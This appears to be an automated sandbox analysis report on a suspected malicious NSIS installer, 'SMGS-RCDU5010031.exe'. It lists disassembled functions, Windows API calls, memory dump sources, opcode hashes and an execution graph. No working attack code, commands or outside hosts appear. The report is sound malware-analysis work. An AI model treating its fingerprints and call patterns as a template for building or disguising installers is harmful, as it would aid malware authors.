                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3585118688-0
                                                                                                                                                                                                          • Opcode ID: 9379c59bfbec92586b7bea6de4fb4a4f736cfbaa92e5777ace76eb21c172b2cc
                                                                                                                                                                                                          • Instruction ID: 5d6a9cd2629b2ba724fb53646afbed83d489e6abcf8a7a9a4f308d22f643bc11
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9379c59bfbec92586b7bea6de4fb4a4f736cfbaa92e5777ace76eb21c172b2cc
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2011AD31900508EBDF21AFA1CD849DE7AB6EF40354F21403BF605B61E1C7798A82DB9E
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00402D8A Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • DestroyWindow.USER32(00000000,00000000,00402F6A,?,?,?,"C:\Users\user\Desktop\SMGS-RCDU5010031.exe",00403536,?), ref: 00402D9D
                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 00402DBB
                                                                                                                                                                                                          • CreateDialogParamW.USER32(0000006F,00000000,00402D04,00000000), ref: 00402DD8
                                                                                                                                                                                                          • ShowWindow.USER32(00000000,00000005,?,?,"C:\Users\user\Desktop\SMGS-RCDU5010031.exe",00403536,?), ref: 00402DE6
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2102729457-0
                                                                                                                                                                                                          • Opcode ID: df109012b7806b8de8df2929ec67b86acfc6093236d2d9f47b9f955c0080d778
                                                                                                                                                                                                          • Instruction ID: 9565580f91e6c8b036764476f8379a8a9497e0cf8b36b33943f0ae23fa557cda
                                                                                                                                                                                                          • Opcode Fuzzy Hash: df109012b7806b8de8df2929ec67b86acfc6093236d2d9f47b9f955c0080d778
                                                                                                                                                                                                          • Instruction Fuzzy Hash: FFF05E30501520BBC671AB20FF4DA9B7B64FB40B11701447AF042B15E4C7B80D828B9C
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00405B0C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00406050: lstrcpynW.KERNEL32(?,?,00000400,0040334D,Snubbendes Setup,NSIS Error), ref: 0040605D
                                                                                                                                                                                                            • Part of subcall function 00405AAF: CharNextW.USER32(?,?,0042FA50,?,00405B23,0042FA50,0042FA50,75BA3420,?,C:\Users\user\AppData\Local\Temp\,00405861,?,75BA3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405ABD
                                                                                                                                                                                                            • Part of subcall function 00405AAF: CharNextW.USER32(00000000), ref: 00405AC2
                                                                                                                                                                                                            • Part of subcall function 00405AAF: CharNextW.USER32(00000000), ref: 00405ADA
                                                                                                                                                                                                          • lstrlenW.KERNEL32(0042FA50,00000000,0042FA50,0042FA50,75BA3420,?,C:\Users\user\AppData\Local\Temp\,00405861,?,75BA3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B65
                                                                                                                                                                                                          • GetFileAttributesW.KERNEL32(0042FA50,0042FA50,0042FA50,0042FA50,0042FA50,0042FA50,00000000,0042FA50,0042FA50,75BA3420,?,C:\Users\user\AppData\Local\Temp\,00405861,?,75BA3420,C:\Users\user\AppData\Local\Temp\), ref: 00405B75
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B0C
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                          • API String ID: 3248276644-3355392842
                                                                                                                                                                                                          • Opcode ID: 1860d25d1cedceeae653fbc66b59fe140c8df0ce2729e3c8c9131a1b177ba99c
                                                                                                                                                                                                          • Instruction ID: 63a6569c831ee5581447f3e1e8ec18e6ac74a78ddfb021a14ce772f4501d9fee
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1860d25d1cedceeae653fbc66b59fe140c8df0ce2729e3c8c9131a1b177ba99c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 32F0F435100E1119D62632361C49BAF2664CF82324B4A023FF952B22D1DB3CB993CC7E
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00405730 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430250,Error launching installer), ref: 00405759
                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00405766
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • Error launching installer, xrefs: 00405743
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                          • String ID: Error launching installer
                                                                                                                                                                                                          • API String ID: 3712363035-66219284
                                                                                                                                                                                                          • Opcode ID: 4fc88ca41c3c45648a755c19479fc4b71f2ef519cf2e9afda518322c17047a2d
                                                                                                                                                                                                          • Instruction ID: 828b4cc1025806f2bb1dde6e09e5b56a6c7607ab0cffe69e3a18accb3258c2b6
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4fc88ca41c3c45648a755c19479fc4b71f2ef519cf2e9afda518322c17047a2d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9CE092B4600209BFEB10AB64AE49F7BBBACEB04704F004565BA51F2190D774E8148A6C
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00403804 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?,75BA3420,00000000,C:\Users\user\AppData\Local\Temp\,004037DC,004035F2,?), ref: 0040381E
                                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 00403825
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00403804
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Free$GlobalLibrary
                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                          • API String ID: 1100898210-3355392842
                                                                                                                                                                                                          • Opcode ID: da2816148213eaf2ca9be615ca64e0b95c5ba1132a9b108e3e9160e8cd70995f
                                                                                                                                                                                                          • Instruction ID: c0ef5988400ca03a2919d730679f4c8cdc7c60ab336a91eb80d60266565c467d
                                                                                                                                                                                                          • Opcode Fuzzy Hash: da2816148213eaf2ca9be615ca64e0b95c5ba1132a9b108e3e9160e8cd70995f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D2E0C2735015309BC6212F45ED0871EB7ACAF59B22F0580BAF8907B26087781C428FD8
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00405A50 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SMGS-RCDU5010031.exe,C:\Users\user\Desktop\SMGS-RCDU5010031.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\SMGS-RCDU5010031.exe",00403536,?), ref: 00405A56
                                                                                                                                                                                                          • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SMGS-RCDU5010031.exe,C:\Users\user\Desktop\SMGS-RCDU5010031.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\SMGS-RCDU5010031.exe",00403536,?), ref: 00405A66
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CharPrevlstrlen
                                                                                                                                                                                                          • String ID: C:\Users\user\Desktop
                                                                                                                                                                                                          • API String ID: 2709904686-3370423016
                                                                                                                                                                                                          • Opcode ID: 1e2f59ad4ff0707ecda417660e1f53ddee00da6e1af2314932cd9a88429354c1
                                                                                                                                                                                                          • Instruction ID: 94586c4fc4af0aa81d4ff890ae3cf2b30e5be6a9e55ec7b9bf63862dfaa4d6e2
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1e2f59ad4ff0707ecda417660e1f53ddee00da6e1af2314932cd9a88429354c1
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0ED05EB2411920AAC312A714DD44DAF73ACEF123007464466F441A6161D7785D818AAD
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 100010E1 Relevance: 5.1, APIs: 4, Instructions: 104memoryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 100011C7
                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 100011D9
                                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 10001203
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.12055918566.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.12055888328.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12055950186.0000000010003000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12055980900.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_10000000_SMGS-RCDU5010031.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Global$Free$Alloc
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1780285237-0
                                                                                                                                                                                                          • Opcode ID: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                                                                                                                                                                          • Instruction ID: f345eba8489605592ce73ef35c78e6b42925bf5f5eceaf1f60f0973e38c56604
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                                                                                                                                                                          • Instruction Fuzzy Hash: AE318FF6904211DBF314CF64DC859EA77E8EB853D0B12452AFB45E726CEB34E8018765
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00405B8A Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E6B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9A
                                                                                                                                                                                                          • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405BB2
                                                                                                                                                                                                          • CharNextA.USER32(00000000,?,00000000,00405E6B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BC3
                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000,?,00000000,00405E6B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BCC
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 190613189-0
                                                                                                                                                                                                          • Opcode ID: e0aa3f8b5d9062cafbb7b658161da2b40476d8243bb4b83799a9e8f5804b25e7
                                                                                                                                                                                                          • Instruction ID: 8848f7d8d782bbf7f3224fb8fd0babd0dea9e1ab2e05ea72f699364142252924
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e0aa3f8b5d9062cafbb7b658161da2b40476d8243bb4b83799a9e8f5804b25e7
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 72F0C231100914EFCB029FA5CD4099FBFB8EF06350B2540A9E840F7311D674FE019BA8
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                          Execution Coverage:3%
                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:99.8%
                                                                                                                                                                                                          Signature Coverage:1.6%
                                                                                                                                                                                                          Total number of Nodes:1661
                                                                                                                                                                                                          Total number of Limit Nodes:5
                                                                                                                                                                                                          execution_graph 7284 37564ed7 7295 37566d60 7284->7295 7289 37564ef4 7291 3756571e 20 API calls 7289->7291 7292 37564f29 7291->7292 7293 37564eff 7294 3756571e 20 API calls 7293->7294 7294->7289 7296 37566d69 7295->7296 7298 37564ee9 7295->7298 7328 37566c5f 7296->7328 7299 37567153 GetEnvironmentStringsW 7298->7299 7300 3756716a 7299->7300 7310 375671bd 7299->7310 7303 37567170 WideCharToMultiByte 7300->7303 7301 375671c6 FreeEnvironmentStringsW 7302 37564eee 7301->7302 7302->7289 7311 37564f2f 7302->7311 7304 3756718c 7303->7304 7303->7310 7305 375656d0 21 API calls 7304->7305 7306 37567192 7305->7306 7307 375671af 7306->7307 7308 37567199 WideCharToMultiByte 7306->7308 7309 3756571e 20 API calls 7307->7309 7308->7307 7309->7310 7310->7301 7310->7302 7312 37564f44 7311->7312 7313 3756637b 20 API calls 7312->7313 7323 37564f6b 7313->7323 7314 37564fcf 7315 3756571e 20 API calls 7314->7315 7316 37564fe9 7315->7316 7316->7293 7317 3756637b 20 API calls 7317->7323 7318 37564fd1 7319 37565000 20 API calls 7318->7319 7321 37564fd7 7319->7321 7320 3756544d 26 API calls 7320->7323 7322 3756571e 20 API calls 7321->7322 7322->7314 7323->7314 7323->7317 7323->7318 7323->7320 7324 37564ff3 7323->7324 7326 3756571e 20 API calls 7323->7326 7325 375662bc 11 API calls 7324->7325 7327 37564fff 7325->7327 7326->7323 7329 37565af6 38 API calls 7328->7329 7330 37566c6c 7329->7330 7331 37566d7e 38 API calls 7330->7331 7332 37566c74 7331->7332 7348 375669f3 7332->7348 7335 37566c8b 7335->7298 7338 37566cce 7341 3756571e 20 API calls 7338->7341 7341->7335 7342 37566cc9 7343 37566368 20 API calls 7342->7343 7343->7338 7344 37566d12 7344->7338 7372 375668c9 7344->7372 7345 37566ce6 7345->7344 7346 3756571e 20 API calls 7345->7346 7346->7344 7349 375654a7 38 API calls 7348->7349 7350 37566a05 7349->7350 7351 37566a26 7350->7351 7352 37566a14 GetOEMCP 7350->7352 7353 37566a2b GetACP 7351->7353 7354 37566a3d 7351->7354 7352->7354 7353->7354 7354->7335 7355 375656d0 7354->7355 7356 3756570e 7355->7356 7360 375656de 7355->7360 7357 37566368 20 API calls 7356->7357 7359 3756570c 7357->7359 7358 375656f9 RtlAllocateHeap 7358->7359 7358->7360 7359->7338 7362 37566e20 7359->7362 7360->7356 7360->7358 7361 3756474f 7 API calls 7360->7361 7361->7360 7363 375669f3 40 API calls 7362->7363 7365 37566e3f 7363->7365 7364 37566eb5 7375 37566acb GetCPInfo 7364->7375 7365->7364 7368 37566e90 IsValidCodePage 7365->7368 7370 37566e46 7365->7370 7366 37562ada 5 API calls 7367 37566cc1 7366->7367 7367->7342 7367->7345 7369 37566ea2 GetCPInfo 7368->7369 7368->7370 7369->7364 7369->7370 7370->7366 7448 37566886 7372->7448 7374 375668ed 7374->7338 7380 37566b05 7375->7380 7384 37566baf 7375->7384 7377 37562ada 5 API calls 7379 37566c5b 7377->7379 7379->7370 7385 375686e4 7380->7385 7383 37568a3e 43 API calls 7383->7384 7384->7377 7386 375654a7 38 API calls 7385->7386 7387 37568704 MultiByteToWideChar 7386->7387 7389 37568742 7387->7389 7396 375687da 7387->7396 7392 375656d0 21 API calls 7389->7392 7397 37568763 7389->7397 7390 37562ada 5 API calls 7393 37566b66 7390->7393 7391 375687d4 7404 37568801 7391->7404 7392->7397 7399 37568a3e 7393->7399 7395 375687a8 MultiByteToWideChar 7395->7391 7398 375687c4 GetStringTypeW 7395->7398 7396->7390 7397->7391 7397->7395 7398->7391 7400 375654a7 38 API calls 7399->7400 7401 37568a51 7400->7401 7408 37568821 7401->7408 7405 3756881e 7404->7405 7406 3756880d 7404->7406 7405->7396 7406->7405 7407 3756571e 20 API calls 7406->7407 7407->7405 7409 3756883c 7408->7409 7410 37568862 MultiByteToWideChar 7409->7410 7411 3756888c 7410->7411 7412 37568a16 7410->7412 7415 375656d0 21 API calls 7411->7415 7417 375688ad 7411->7417 7413 37562ada 5 API calls 7412->7413 7414 37566b87 7413->7414 7414->7383 7415->7417 7416 375688f6 MultiByteToWideChar 7418 3756890f 7416->7418 7434 37568962 7416->7434 7417->7416 7417->7434 7435 37565f19 7418->7435 7420 37568801 20 API calls 7420->7412 7422 37568971 7424 37568992 7422->7424 7427 375656d0 21 API calls 7422->7427 7423 37568939 7426 37565f19 11 API calls 7423->7426 7423->7434 7425 37568a07 7424->7425 7428 37565f19 11 API calls 7424->7428 7429 37568801 20 API calls 7425->7429 7426->7434 7427->7424 7430 375689e6 7428->7430 7429->7434 7430->7425 7431 375689f5 WideCharToMultiByte 7430->7431 7431->7425 7432 37568a35 7431->7432 7433 37568801 20 API calls 7432->7433 7433->7434 7434->7420 7436 37565c45 5 API calls 7435->7436 7437 37565f40 7436->7437 7440 37565f49 7437->7440 7443 37565fa1 7437->7443 7441 37562ada 5 API calls 7440->7441 7442 37565f9b 7441->7442 7442->7422 7442->7423 7442->7434 7444 37565c45 5 API calls 7443->7444 7445 37565fc8 7444->7445 7446 37562ada 5 API calls 7445->7446 7447 37565f89 LCMapStringW 7446->7447 7447->7440 7449 37566892 7448->7449 7456 37565671 RtlEnterCriticalSection 7449->7456 7451 3756689c 7457 375668f1 7451->7457 7455 375668b5 7455->7374 7456->7451 7469 37567011 7457->7469 7459 3756693f 7460 37567011 26 API calls 7459->7460 7461 3756695b 7460->7461 7462 37567011 26 API calls 7461->7462 7463 37566979 7462->7463 7464 375668a9 7463->7464 7465 3756571e 20 API calls 7463->7465 7466 375668bd 7464->7466 7465->7464 7483 375656b9 RtlLeaveCriticalSection 7466->7483 7468 375668c7 7468->7455 7470 37567022 7469->7470 7479 3756701e 7469->7479 7471 37567029 7470->7471 7474 3756703c 7470->7474 7472 37566368 20 API calls 7471->7472 7473 3756702e 7472->7473 7475 375662ac 26 API calls 7473->7475 7476 37567073 7474->7476 7477 3756706a 7474->7477 7474->7479 